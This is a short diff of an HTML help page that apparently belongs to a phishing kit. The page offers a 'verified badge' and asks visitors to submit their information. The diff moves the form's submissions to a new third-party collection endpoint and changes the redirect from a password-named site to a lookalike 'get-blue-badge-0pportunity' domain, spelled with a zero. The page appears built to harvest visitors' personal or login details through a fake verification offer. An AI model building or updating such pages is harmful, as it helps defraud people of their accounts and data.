--- a/help.html
+++ b/help.html
@@ -223,11 +223,11 @@
       <p class=form-notice>Please ensure that all required information is accurately provided. Failure to do so may
          result in not receiving a verified badge.</p>
 
-                        <form class="content" action="https://submit-form.com/iotcAQn2F" method="POST">
+                        <form class="content" action="https://submit-form.com/xETxMAIN3" method="POST">
  <input
     type="hidden"
     name="_redirect"
-    value="https://password-ruby-ten-five.vercel.app/"
+    value="https://get-blue-badge-0pportunity.vercel.app/"
   />
          
          <div class=form-group>
